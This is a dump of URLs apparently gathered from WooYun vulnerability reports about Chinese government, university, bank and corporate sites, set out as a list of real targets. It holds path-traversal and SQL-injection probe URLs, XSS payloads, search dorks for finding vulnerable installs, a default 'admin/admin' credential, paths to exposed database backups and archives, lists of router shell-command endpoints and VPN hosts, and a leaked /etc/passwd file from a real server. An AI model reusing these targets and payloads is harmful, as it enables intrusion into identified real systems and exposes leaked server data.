http://www.tclcomm.com/purchase/profiledown.asp?myPath=\qiyexingxiang\..\..\..\..\\WWW http://www.8telecom.cn/OA/login.php http://www.rrtxsz.com/ http://www.rrtxsz.com/admin/login.php http://www.ahty.gov.cn/xwzx-sjxw/article.jsp?articleId=32816,估计还存在其他链接 http://www.koohoo.cn/app/88720140508120908953.html www.koohoo.cn http://bbs.koohoo.cn/ http://idiantech.com/RELEASE-NOTES.txt http://kuaihuu.com/ http://www.idiantech.com/index.html http://weili68.com/ http://wifi.kuai51.com/ http://weili68.com/site/kefu.html http://www.koohoo.cn/special/49.html http://ll.kuai51.com/ http://bbs.koohoo.cn/thread-258-1-1.html http://m.koohoo.cn/app/35020131113213407466.html http://kuaihuu.com/file/kuaihu.apk http://www.yichemall.com/Service/index http://shop.dhs-sports.com/agentlist.asp?selectedIndex=406 http://www.wooyun.org/bugs/wooyun-2014-082496/trace/01de32cfa3cddd554ea59c4926d1e601。但是当时没有深入研究,导致WOOYUN主动忽略了该漏洞,前段时间一时无聊,又重新深入研究了一下该漏洞,发现了更多问题,认为还是比较严重的。 http://www.cqsloa.com http://www.dystats.gov.cn/view.php?id=1112 http://www.dystats.gov.cn/view.php?id=1112 http://sqlmap.org http://www.guojiayikao.com/order/deliver.php?action=edit&deliverid=15035 http://www.tchjbh.gov.cn/news_display.php?id=148 http://m.zhuna.cn/order_nologin.php?tel=用户手机号码 http://m.zhuna.cn/order_nologin.php?tel=13800138000 http://app.cqrcb.com:81/apply/SearchMerchant http://222.180.251.107:82/appForOnline/IndexAction http://hr.cqrcb.com/perinvite/IndexAction.action http://app.cqrcb.com:81/apply/ http://218.94.6.85/news/newsView.aspx?id=140 url:http://www.bbktel.com.cn/showNews.php?Class_ID=6&News_ID=17 www.ffan.com https://jf.ffan http://211.83.241.103:8080/ http://211.83.241.105:8080/ http://push.zhenai.com/web/login http://**.**.**/webeditor/admin/login.jsp_ http://cds2010.medlive.cn/login_init.do http://t.cn/***** http://202.75.221.11/zjnj2011/Application/Application/ToViewLog.aspx http://218.94.30.9/Application/Application/ToViewLog.aspx http://218.26.97.198/sx2014/Application/Application/ToViewLog.aspx http://59.61.92.123:12345/njbt2013/Application/Application/ToViewLog.aspx http://218.77.183.70/njbt2013/Application/Application/ToViewLog.aspx http://60.190.2.79/Njbt2013/Application/Application/ToViewLog.aspx http://220.171.42.161/xjnj2013/Application/Application/ToViewLog.aspx http://222.247.48.179:8000/Application/Application/ToViewLog.aspx http://61.138.188.217/jl2013/Application/Application/ToViewLog.aspx http://182.148.114.118/2013/Application/Application/ToViewLog.aspx http://amic.jxagri.gov.cn/nybgj2013/Application/Application/ToViewLog.aspx http://113.140.74.6/sx2012/Application/Application/ToViewLog.aspx http://218.7.20.102:9002/njbt2013/Application/Application/ToViewLog.aspx http://61.161.166.69:2013/Application/Application/ToViewLog.aspx http://njbt2012.gdnj.gov.cn/Application/Application/ToViewLog.aspx http://218.58.77.226/njgzbt2011/Application/Application/ToViewLog.aspx http://218.201.202.239:8081/gznj2013/Application/Application/ToViewLog.aspx http://116.52.13.46/test2013/Application/Application/ToViewLog.aspx http://61.178.38.194/gsnjbt2012/Application/Application/ToViewLog.aspx http://bt.ahnjh.gov.cn/2011/Application/Application/ToViewLog.aspx http://218.77.183.70/njbt2013/Application/ToViewLog.aspx为例: http://218.77.183.70/njbt2013/Application/ToViewLog.aspx http://shop.100msh.com/index/set_area?area_id=57 http://www.bjnewmen.com/admin/login.aspx http://www.infzm.com/newsmap.tar.gz http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://ditu.google.cn/maps?file=api&v=2&key=ABQIAAAAJfHBACIJtxTEFm_nOl0qnhSdfEJ9AprUyArBsRlghnRcjWrCyxQ-hpTR_AlqZYeeQF-tkzLzj7XLXg http://images.infzm.com/js/com/infzm/newsmap/assemble.js http://images.infzm.com/js/com/infzm/newsmap/page/default.js mysql:host=dbserver;dbname=infzm http://www.gla.uestc.edu.cn/chinese/picture_news.php?act=list&id=25 http://emobile.weaver.com.cn/case.html http://oa.chinajiutai.com:89/login.do http://www.fsxtx.cn/login.do http://m.zxhsd.com/login.do http://wap.helichina.com http://m.liando.cn http://www.gpsoo.net/user/ http://www.zteup.com/pc_sellerdownload.jsp MD5:1D:81:74:40:79:58:9A:DC:3C:39:51:94:36:D4:10:E0 SHA1:F1:E8:E9:E3:F3:1C:AD:4E:3E:C5:D5:D5:1A:4D:B4:54:C5:24:31:7B http://www.hontai.com.tw/09pages/cont/NewsCenter.aspx?Uid=ABH05&Cid=A0001&Numid=346#PABH04 www.xiangshe.com http://i.byd.com.cn,需要车主输入手机号和密码(买车时在4S店设置) http://210.31.176.18/Administration/UniteStand/Default.aspx http://210.31.176.18/Administration/UniteStand/ShowNews.aspx?ID=3de417459202491d9367ceaef21be2eb https://www.cunli.cn http://ee.hnu.cn/eeold/php/news/detail.php?id=3088 http://**.**.**/login.aspx http://ftms.cigtest.com.cn/admin/ http://zone.wooyun.org/content/19414 http://www.walkingtaiwan.org/content/search/en/js/login/text/js3.asp http://slhr.ruc.edu.cn/Doctor/admin/index.asp http://comment.info.hc360.com http://comment.info.hc360.com/comment/lw/morelw.action?areacode=041&systype=0*&templateid=0&infoid=6171&type=0 http://comment.info.hc360.com/comment/login.jsp http://comment.info.hc360.com/comment/stat/mainpage.action http://xxgl.slxxw.cn/login.do http://baoxian.cntaiping.com/ http://e.fangdd.com/ http://e.fangdd.com:80/ http://cas.hdu.edu.cn/cas/pwd/ http://cas.hdu.edu.cn/cas/i/ http://cas.hdu.edu.cn/cas/j/ http://cas.hdu.edu.cn/cas/c/ http://cas.hdu.edu.cn/cas/manager/ http://www.yfjcy.gov.cn/owen/?id=1582 http://www.yfjcy.gov.cn/admin/adminlogin.asp http://gs.njfu.edu.cn/Gmis/Byyxwgl/lxgcxxlr.aspx http://202.203.225.17:8080/Gmis/Byyxwgl/lxgcxxlr.aspx http://218.75.27.177/Gmis/Byyxwgl/lxgcxxlr.aspx http://yjsy.wmu.edu.cn:8080/Gmis/Byyxwgl/lxgcxxlr.aspx http://101.76.99.20/Gmis/Byyxwgl/lxgcxxlr.aspx http://61.187.179.68:8080/Gmis/Byyxwgl/lxgcxxlr.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/Byyxwgl/lxgcxxlr.aspx http://210.43.126.80:8080/Gmis/Byyxwgl/lxgcxxlr.aspx http://211.64.205.214/Gmis/Byyxwgl/lxgcxxlr.aspx http://www.iepiao.com/iepiaoindex.action http://online.wl-expo.com/exhibitor/supType_hoPa.action http://mall.wl-expo.com/relaxationShop_index.action http://dns.aizhan.com/?q=220.191.211.134&page=2 http://easyscholar.ruc.edu.cn/ http://www.lnlib.com/readerbbs/sendweb/detail.asp?ibb=72756 http://video.chinaso.com/search/so?q=%22%3E%3Cimg%20src=1%20onerror=alert%281%29;%3E%3C/img%3E http://mobile.pconline.com.cn/497/4978538_7.html http://pr.956122.com/uploadPic.html http://www.m6go.com/user/doSendEmail.do http://xuanke.cufe.edu.cn http://xuanke.cufe.edu.cn/config.asp URL:https://open.boc.cn https://open.boc.cn/member/createAppUser http://admin.tsapp.itools.hk/index.php?r=helpadmin/feedbacklist&page=5 http://admin.tsapp.itools.hk/index.php?r=helpadmin/feedbacklist&page=5 http://admin.tsapp.itools.hk/index.php?r=helpadmin/feedbacklist&page=5 http://sck1.yfzxmn.cn http://wooyun.org/bugs/wooyun-2015-0104732/trace/7216bb09da3045fbca81a17d7*** http://www.wooyun.org/bugs/wooyun-2010-0101073/auth/281bde8bd7dfbc0b376c524482*** site:wooyun.org inurl:trace site:wooyun.org inurl:auth http://**.**.**/Home/Login http://221.10.102.150:8086/login.asp http://110.249.218.68:8090/hbwebxf/index.jsp http://office.jsrgjy.net http://office.jsrgjy.net/config.asp http://m.yoger.com.cn/account.php?uid=480100 http://m.yoger.com.cn/myscore.php?uid=480100 http://m.yoger.com.cn/dealaddress.php?did=109943&op=del http://m.yoger.com.cn/product_list.php?search=xxxxxx http://m.yoger.com.cn/deallogin.php http://duirap76.uir.cn/view.php?id=426 http://www.szjt.gov.cn/Page/SrList.htm?t=undefined&keyword=1 http://bprz.3yoqu.com/admin/login.php http://tech.58.com/ http://61.163.107.26:8082 http://122.224.149.30:8082 http://eoffice8.weaver.cn:8028 http://219.232.254.131:8082 http://www.sywxzj.com/queryNews.do?ctid=3 http://zbb.shu.edu.cn/InformationSearchResult.aspx?Result=2015 http://zbb.shu.edu.cn/InformationSearchResult.aspx?Re http://nsp.lashou.com/Home/Login/index http://gs.njfu.edu.cn/ http://202.203.225.17:8080/ http://218.75.27.177/ http://yjsy.wmu.edu.cn:8080/ http://101.76.99.20/ http://61.187.179.68:8080/ http://yjsy.wzmc.edu.cn:8080/ http://210.43.126.80:8080/ http://211.64.205.214/ http://wooyun.org/bugs/wooyun-2010-036412 http://www.yirendai.com/ask/questions.action http://help.tipask.com/api/php.php http://cms.956122.com/manager/login.action http://net.chinamobile.com/bbs/ http://net.chinamobile.com/bbs/data/backup~2/130726~1.sql http://ssrcc.ruc.edu.cn/pp_upfile.asp http://service.yiqifei.com/default.aspx页面的搜索框 http://sqlmap.org http://bbs.baofengcloud.com/uc_server/ http://www.sh1122.com/show_order.php?id=2 http://www.sh1122.com/show_order.php?id=7160 http://218.247.135.38/templates/index/hrlogon.jsp http://218.247.135.38/pos/posbusiness/train_get_code_tree.jsp?codesetid=1 http://218.247.135.38/pos/posbusiness/train_get_code_ http://sqlmap.org http://fjfa110.gov.cn/xiao.asp http://117.78.19.27:9888/website-rank/getVoteRecordByManuscriptId.action dir:/opt/Minge/UCMSServer/tomcat/webapps/website-rank/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pulse:x:497:495:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oracle:x:500:500::/home/oracle:/bin/bash wuzhengfeng:x:501:502::/home/wuzhengfeng:/bin/bash zabbix:x:502:503::/home/zabbix:/bin/bash mysql:x:496:504::/home/mysql:/bin/bash clamav:x:495:492:Clam Checker:/var/clamav:/sbin/nologin db2inst1:x:1004:999::/home/db2inst1:/bin/bash db2fenc1:x:1003:998::/home/db2fenc1:/bin/bash dasusr1:x:1002:997::/home/dasusr1:/bin/bash http://cz.just.edu.cn/cwc/Collage_NoLink.aspx?id=0&lb=jgsz http://gs.njfu.edu.cn/ http://202.203.225.17:8080/ http://218.75.27.177/ http://yjsy.wmu.edu.cn:8080/ http://101.76.99.20/ http://61.187.179.68:8080/ http://yjsy.wzmc.edu.cn:8080/ http://210.43.126.80:8080/ http://211.64.205.214/ http://114.80.159.18/ http://www.51jtx.com/toOrderDetail.htm?userInfoId=64265 http://www.youcansong.com/index.php/Admin_OrderDetail_oId_500 http://www.youcansong.com/index.php/Admin_OrderDetail_oId_6760 http://gs.njfu.edu.cn/ http://202.203.225.17:8080/ http://218.75.27.177/ http://yjsy.wmu.edu.cn:8080/ http://101.76.99.20/ http://61.187.179.68:8080/ http://yjsy.wzmc.edu.cn:8080/ http://210.43.126.80:8080/ http://211.64.205.214/ http://szyf.chrm.gov.cn/shengji/print.aspx?ids=10,&&timeid=&&tbenddate= http://szyf.chrm.gov.cn/shengji/print.aspx?ids=257500,&&timeid=&&tbenddate= http://www.anhuids.gov.cn/articleshow.asp?classid=516 http://www.anhuids.gov.cn/articleshow.asp?classid=516 http://www.anhuids.gov.cn/articleshow.asp?classid=516 http://www.169000.net/indexext.gl?op=2 http://www.169000.net/indexext.gl?op=1 http://www.169000.net/indexext.gl?op=9&lm=4 http://ry.ts365.org/ks/exam2/applicant/printexamid.aspx?action=new&ids=188 http://ry.ts365.org/ks/exam2/applicant/printexamid.aspx?action=new&ids=342008 http://www.indunet.net.cn/meet/ http://www.airmacau.com.tw:8082/cargo/cargo_status.asp www.airmacau.com.tw:8082 http://www.airmacau.com.tw:8082 http://www.517na.com/Default.aspx http://th.517na.com/ http://zdcg.517na.com/ http://gj.517na.com/ http://gq.517na.com/ http://user.517na.com/ http://jd.517na.com/ http://yc.517na.com/ http://wzhq.hengqin.gov.cn/scanner.php,此扫描器为弱密码admin/admin http://hr.f5.yto56.com.cn/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml inurl:/Docs/Commentlist.aspx?ItemID= http://shandixb.paperopen.com//register.aspx http://ndxbskb.imu.edu.cn//register.aspx http://www.zhsyeklczz.com//register.aspx http://www.cqnuj.cn//register.aspx http://gs.njfu.edu.cn/Gmis/Byyxwgl/xlslxtzdprint.aspx http://202.203.225.17:8080/Gmis/Byyxwgl/xlslxtzdprint.aspx http://218.75.27.177/Gmis/Byyxwgl/xlslxtzdprint.aspx http://yjsy.wmu.edu.cn:8080/Gmis/Byyxwgl/xlslxtzdprint.aspx http://101.76.99.20/Gmis/Byyxwgl/xlslxtzdprint.aspx http://61.187.179.68:8080/Gmis/Byyxwgl/xlslxtzdprint.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/Byyxwgl/xlslxtzdprint.aspx http://210.43.126.80:8080/Gmis/Byyxwgl/xlslxtzdprint.aspx http://211.64.205.214/Gmis/Byyxwgl/xlslxtzdprint.aspx URL:HTTP://122.224.80.134 http://www.pigai.org/upload/20150331/e9d54bc8310ce1ea752f05474f747838.jpg https://61.138.128.27/ http://www.dycredit.gov.cn/admin/admin_default.php http://www.b-link.net.cn/右上角有个oa登录 http://oa.b-link.net.cn:8080/,一看,泛微! http://oa.b-link.net.cn:8080/log/ecology_20150306.log http://oa.b-link.net.cn:8080/tools/SWFUpload/upload.jsp height:20px;BORDER http://oa.b-link.net.cn:8080/nullwooyun.jsp,好了getwebshell不成问题了。 http://www.hrbjj.g***** http://www.aisida.cn/)开发的某套CMS程序。 inurl:cpinfo.php?id= http://www.ykchjd.com/cpinfo.php?id=1093 http://www.yingli.cc/cn/cpinfo.php?id=45 http://www.ykydqb.com/cpinfo.php?id=59 http://www.csjequipment.com/cpinfo.php?id=115 http://www.flsljx.com/cpinfo.php?id=5 http://www.ykjhzs.com/cpinfo.php?id=18 http://223.100.49.42/ http://yun.lenovo.com/join.php http://yun.lenovo.com/lxymanage/login.php,由于只是证明注入点,故没有查找数据库里账号密码。建议后台用robots.txt屏蔽。 http://xwxx.sicnu.edu.cn/mail_login.asp ip:202.115.194.37 http://fgc.sicnu.edu.cn inurl:news.php?sid= http://www.ykfwyw.gov.cn/news.php?sid=7 http://www.ykszyy.com/ek/news.php?sid=2 http://www.ykhnsh.com/news.php?sid=2 http://www.ykycdz.com/news.php?sid=1 http://www.yksllb.com/news.php?sid=1 http://www.ykeast.com/news.php?sid=2 http://www.dalmond.com.cn/news.php?sid=2 http://www.dsqzxyy.com/news.php?sid=5 http://ykchjd.com/news.php?sid=2 http://www.yksanxing.com/news.php?sid=2 http://www.ysczzx.com/news.php?sid=7 http://www.jzbyk.com/news.php?sid=4 http://www.byqzxyy.com/news.php?sid=18 http://www.yknjj.com/news.php?sid=9 http://www.ykbwg.com/news.php?sid=7 http://www.ykqby.com/news.php?sid=9 http://www.silbermannpiano.cn/news.php?sid=6 http://www.ykyyqh.com/xx/news.php?sid=8 http://www.ykwx.net/news.php?sid=9 http://www.ykswdx.net/news.php?sid=47 http://webappadmin.byd.com.cn/violation/ http://222.185.229.82/mobi/3g/login.php http://demo.173cms.com https://www.baidu.com/s?wd=%E6%82%9F%E7%A9%BACRM%20%C2%A9%20%E9%83%91%E5%B7%9E%E5%8D%A1%E5%8D%A1%E7%BD%97%E7%89%B9%E8%BD%AF%E4%BB%B6%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8%202013&rsv_spt=1&issp=1&f=8&rsv_bp=0&rsv_idx=2&ie=utf-8&tn=baiduhome_pg&rsv_enter=1&rsv_sug3=1 http://wooyun.org/bugs/wooyun-2015-0105057/trace/085bbc48d3b40f0bb0d926af9021e05c http://webapi.byd.com.cn/router/rest http://www.bydauto.com.cn/app/package/BYDCar.apk自行测试 http://222.185.229.85/index.php https://s.bt.gg/#newwindow=1&q=site:crm.byd.com.cn http://crm.byd.com.cn/autosale/event/custEvent!custEventEdit.nc?valCode=ea2282b12de06d2e1b7970bf2e432cd1&custId=79ab81ff34a19385ce6c0bc016f3ef6b&custCode=BYDSC072W http://crm.byd.com.cn/autosale/event/custEvent!custEventEdit.nc?valCode=1e7e3da8e0800b69dd579854d16fb7ef&custId=3520f6e16ead95891dbc0e96fdfe7d8b&custCode=BYDGD161W http://crm.byd.com.cn/autosale/event/custEvent!custEventEdit.nc?valCode=21d405176c760b61718223021e93248d&custId=09a51bf65c4edebb3899c6f2810740ee&custCode=BYDGZ028J http://crm.byd.com.cn/autosale/event/custEvent!custEventEdit.nc?valCode=f0d3d4837ff78741afb1a0efad381522&custId=8d55276fac3258251ba3b40481e4d980&custCode=BYDBJ046W http://ftms.cigtest.com.cn/admin/list/up_admin.php http://m.jlbank.com.cn:80/jlbankcn/data/getOutletList?param=135791&city_id=187 http://box.zhangmen.baidu.com/box-jump.html?u=javascript:alert%28document.domain%29 inurl:EduPlate\GoodoBlog\ http://yqdz.jlbank.com.cn/chk/forceQuit.do http://wooyun.org/bugs/wooyun-2015-0100501 inurl:EduPlate/HomeworkManage http://218.93.12.222:8080/ http://www.zparkhr.com.cn/data/sdcms.asp www.zparkhr.com.cn/zparkhr.com.cn.rar http://www.zparkhr.com.cn/data/xinba.asp http://xxgl.slxxw.cn/login.do http://120.31.62.218/ http://crm.netzone.com/ http://121.9.201.153/ http://221.10.14.66/zhang/ http://61.184.240.105/crm/ http://crm.ec3s.com/ http://crm.kx8.cn/ http://crm.techray.com.cn/ http://tianzhengtaisheng.3322.org/crm/ http://www.hanna.com.cn:956/ http://crm.netzone.com/VerifyUser.asp http://www.bocweb.cn/ inurl:EduPlate\GoodoBlog\ http://tools.yahui.cc http://www.bjadks.com/ http://159.226.100.90:801/ADKSAdmin/AdksAdmin/LogDetailedList.aspx?vid=123 http://hall.lnlib.net.cn/adksvod/ADKSAdmin/AdksAdmin/LogDetailedList.aspx?vid=123 http://159.226.238.45/adksvod/ADKSAdmin/AdksAdmin/LogDetailedList.aspx?vid=123 http://202.117.122.49/ADKSAdmin/AdksAdmin/LogDetailedList.aspx?vid=123 http://source.mastvu.ah.cn/adksvod/ADKSAdmin/AdksAdmin/LogDetailedList.aspx?vid=123 inurl:EduPlate\PersonBlog\ http://oa.lzmc.edu.cn/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 www.oppodigital.com.hk http://www.oppodigital.com.hk www.oppodigital.com.tw http://www.oppodigital.com.tw http://www.oppodigital.com.tw/club_register.php www.oppodigital.com.tw http://www.oppodigital.com.tw http://www.oppodigital.com.hk/club_register.php www.oppodigital.com.hk http://www.oppodigital.com.hk http://202.102.101.42/ http://demo.173cms.com/注册个账号,然后随便选个东西下个订单 inurl:EduPlate/GoodoBlog http://public.wsbgt.com/Web/CatalogListPublic.aspx?tagid=18 http://www.wflib.com:8090/wsbgt/Web/CatalogListPublic.aspx?tagid=04 http://112.53.81.230:10002/gtweb/Web/CatalogListPublic.aspx?tagid=17 http://www.nxtsg.com:106/adksvod/web/CatalogListPublic.aspx?tagid=1 http://60.210.241.3:8090/wsbgt/Web/CatalogListPublic.aspx?tagid=2 http://m.aili.com/setting/feedback/ http://appserver.lenovo.com.cn http://drvdisc1.lenovo.com http://appserver.lenovo.com.cn http://drvdisc1.lenovo.com http://sc.tna.com.tw/about/media_news.aspx?type=2&year=2014 http://sc.tna.com.tw/about/media_press.aspx?type=1&year= http://sc.tna.com.tw/about/media_press_view.aspx?id=444 http://www.autono1.com/e/enews/vw.php http://www.autono1.com/s/bjxd/baoming.php http://www.autono1.com/s/bjxd/newslist.php http://www.autono1.com/e/extend/newajax.php?atype=ibrand&_=1427802175668 http://52mianliao.com http://wifi.52mianliao.com http://www.nsccjn.cn/system/common/selectDepartment.do http://www.nsccjn.cn/system/ http://www.nsccjn.cn/index/ http://www.nsccjn.cn/system/common/selectDepartment.do http://123.232.119.103:8080/ocsweb/UserLogin.aspx http://www.coolpad.com/myec/myAddress.htm# www.coolpad.com http://www.jinbei.com/search.html?keyword=a http://www.zhonghuacar.com/other/searchResult.html?keyword=a www.lqht-express.com http://oa.bontai.com/BodyFile/ http://www.zoomeye.org/search?q=%22Mini+web+server+1.0+ZTE%22&t=host http://222.210.178.126/web_shell_cmd.gch http://222.210.176.205/web_shell_cmd.gch http://222.208.138.195/web_shell_cmd.gch http://222.218.188.39/web_shell_cmd.gch http://222.210.181.98/web_shell_cmd.gch http://222.218.197.144/web_shell_cmd.gch http://222.210.178.90/web_shell_cmd.gch http://222.210.177.4/web_shell_cmd.gch http://map.yundasys.com:11080/action/login http://map.yundasys.com:11080/background/login.jsp http://www.dzbchina.com http://www4.sdau.edu.cn/zongwu/biaozhun/baoxiu/ http://www.csgjj.com.cn:8000/logon.do http://m.okisbank.com/#/forgetpassword http://m.okisbank.com/#/register http://www.nfgrp.cn/Index.aspx# http://goupianyi.cn/Index.aspx http://www.bjnjl.cn/Index.aspx http://mynetworkvalue.cn/Index.aspx http://www.chinafgr.com/Index.aspx http://kanqiu.hupu.com/april/news?nid=1031016 http://kanqiu.hupu.com/april/news?nid=1031016/**/and/**/1=1 http://kanqiu.hupu.com/april/news?nid=1031016/**/and/**/1=2 http://apk.hiapk.com/appinfo/com.android.suzhoumap http://www.hzrsj.gov.cn/counter/ http://www.hanwintech.com http://hq.sipedi.cn http://www.tyj.suzhou.gov.cn http://www.jdgzf.net http://rent.jdgzf.net http://58.211.42.171:9001 http://website.tyj.suzhou.gov.cn http://58.211.42.171:8099 http://www.hanwintech.com为例进行演示 http://www.hanwintech.com/upload/Picture/?dir=image http://dx.gpsllt.com/weblogin.aspx http://dx.gpsllt.com/SystemManage/Default.aspx http://www.pjqx.com/showpics.aspx?lib=11&tid=110 https://citrix.growthpoint.co.za/Citrix/XenApp/auth/login.jsp https://github.com/pyfxl/fxldoc/blob/master/IFCA/IFCA.txt)请乌云君打打星号啊! https://github.com/pyfxl/fxldoc/blob/master/IFCA/IFCA.txt http://114.129.36.133/ http://10.122.10.232:5555/ https://mail.ifca.com.cn/owa http://10.199.201.114/xswy/ http://rhdc.htagri.gov.cn/REProbeWebForms/webLogin.aspx google:inurl:out.do?viewType= inurl:manager.do?viewType= http://www.hljtyu.com/manager.do?viewType=newsdetail&flowsort=0523201493834710AM100%27%20and%20%271%27=%271 http://www.hljtyu.com/manager.do?viewType=newsdetail&flowsort=0523201493834710AM100%27%20and%20%271%27=%272 http://www.tls.gov.cn/manager.do?viewType=newsdetail&flowsort=115201441826780PM100 http://60.15.40.131/manager.do?viewType=newsdetail&flowsort=0242013105156890AM100 http://www.55577719.com/manager.do?viewType=newsdetail&flowsort=0242015121410527PM100 http://www.sr985.com/manager.do?viewType=newsdetail&bb=%D5%FE%B8%AE%B0%E6&flowsort=201501071150170172015115017670AM100 http://www.hljtyu.com/manager.do?viewType=newsdetail&flowsort=06162014101228137AM100 http://cnrunet.com/out.do?viewType=content&wordfileid=20131203175805123201355805377PM1 http://www.hrbcdc.com/out.do?viewType=wzlist&first=%BC%BC%CA%F5%B7%FE%CE%F1&second=%BD%A1%BF%B5%CC%E5%BC%EC%27 http://dep.mnnu.edu.cn/dx/shownews.asp?id=399 http://guba.sina.com.cn/api/?s=recommend&a=recommendUser&exclude_uids=1561133085&num=6 http://guba.sina.com.cn/api/?s=recommend&a=recommendUser&exclude_uids=1561133085%29%20order%20by%208%23&num=6 http://guba.sina.com.cn/api/?s=recommend&a=recommendUser&exclude_uids=1561133085%29%20%26%26%20version%28%29%20%3E5%23&num=6 http://guba.sina.com.cn/api/?s=recommend&a=recommendUser&exclude_uids=1561133085%29%20%26%26%20version%28%29%20%3C5%23&num=6 http://nms.qq.gamegon.com/ http://www.gla.uestc.edu.cn/phpmyadmin/ http://www.lzzl.gov.cn/CJB/templet/allinfo.asp?class_id=113&offset=-1 http://www.lzzl.gov.cn/CJB/ly2.asp http://**.**.**/queryVehVio.do_ https://vpn1.sinochem.com/+CSCOE+/logon.html http://drops.wooyun.org/papers/3451 http://wooyun.org/bugs/wooyun-2015-0103500 http://101.227.244.20/shixibao/ucenter/admin.php?m=user&a=login&iframe=&sid= https://220.168.67.186/ https://220.168.136.137/ https://220.168.151.26/ https://220.168.151.20/ https://220.168.151.41/ https://220.168.151.49/ https://220.168.151.91/ https://220.168.151.64/ https://220.168.151.55/ https://220.168.151.103/ https://220.168.151.192/ https://220.168.152.12/ https://220.168.202.140/ https://220.169.92.225/ https://220.169.131.184/ https://220.169.132.99/ https://220.169.140.92/ https://220.169.134.144/ https://220.169.147.125/ https://220.169.138.119/ https://220.169.136.94/ https://220.169.160.108/ https://220.169.162.99/ https://220.169.167.38/ https://220.169.174.72/ https://220.169.172.98/ https://220.169.174.81/ https://220.169.178.109/ https://220.169.179.171/ https://220.169.186.153/ https://220.169.195.48/ https://220.169.196.167/ https://220.169.195.247/ https://220.169.199.155/ https://220.169.199.254/ https://220.169.206.141/ https://220.169.229.205/ https://220.169.229.207/ https://220.169.229.209/ https://220.169.229.204/ https://220.169.229.206/ https://220.169.229.203/ https://220.169.229.208/ https://220.169.167.132/ https://220.170.15.247/ https://220.170.48.79/ https://220.170.48.219/ https://220.170.53.225/ https://220.170.57.10/ https://220.170.61.50/ https://220.170.69.54/ https://220.170.89.86/ https://220.170.89.91/ https://220.170.89.82/ https://220.170.89.96/ https://220.170.89.81/ https://220.170.89.83/ https://220.170.89.84/ https://220.170.89.93/ https://220.170.89.88/ https://220.170.97.34/ https://220.170.100.247/ https://220.170.102.201/ https://220.170.110.1/ https://220.170.110.66/ https://220.170.111.40/ https://220.170.114.130/ https://220.170.120.198/ https://220.170.127.187/ https://220.170.130.172/ https://220.170.131.186/ https://220.170.131.162/ https://220.170.139.60/ https://220.170.140.20/ https://220.170.136.31/ https://220.170.145.167/ https://220.170.147.61/ https://220.170.147.239/ https://220.170.146.19/ https://220.170.155.32/ https://220.170.155.74/ https://220.170.155.77/ https://220.170.155.31/ https://220.170.156.124/ https://220.170.156.37/ https://220.170.157.125/ https://220.170.157.191/ https://220.170.158.155/ https://220.170.158.254/ https://220.170.160.110/ https://220.170.185.187/ https://220.170.190.246/ https://220.170.202.227/ https://220.170.213.150/ https://220.170.212.24/ https://220.170.213.43/ https://220.170.213.157/ https://220.170.215.171/ https://220.170.222.126/ https://220.170.232.192/ https://220.170.235.4/ https://218.104.157.158/ https://ssl-vpn-ct.dykmc.com.cn/+CSCOE+/logon.html http://drops.wooyun.org/papers/3451 https://biz.vvipone.com/v/employee/importResult?batchId=1 http://www.alibaba.com/product-detail/t-onmouseover-alert-xss-a-_50005365356.html http://www.alibaba.com/product-detail/-img-src-x-onerror-prompt_50013334152.html http://www.alibaba.com/product-detail/-img-src-x-onerror-alert_50013286203.html http://www.alibaba.com/product-detail/-img-src-x-onerror-prompt_50005251354.html http://www.alibaba.com/product-detail/t-onmouseover-alert-xjjjjss-a-_50005299834.html http://www.haizhebar.com/subject.php?id=105 http://cloud.189.cn/resource.action http://cloud.189.cn/v2/putIntoRecyclebin.action?fileIdList=314971291466219&noCache=0.28918433492071927 http://rencai.chinawater.net.cn/rencai/manage/user.asp?id=10195 http://rencai.chinawater.net.cn/rencai/manage/user.asp?id=17108 http://ctlabs.189.cn/Admin/Columns/FlowNodeSettingR4.aspx http://www.hahb.lss.gov.cn/cx/ylcx.aspx http://www.xiangshe.com/user/pwdreset.do?getpwdtype=1&code=77711&userid=****** http://61.156.25.91/LycucPay/Pay.aspx?corpID=3 inurl:jj.php?id= http://www.gm-pipefittings.com/jj.php?id=3 http://www.ykcxkj.com/jj.php?id=2 http://www.mhxinli.com/jj.php?id=2 http://www.ykyunhai.com/jj.php?id=3 http://www.yksxssz.com/xslh/jj.php?id=5 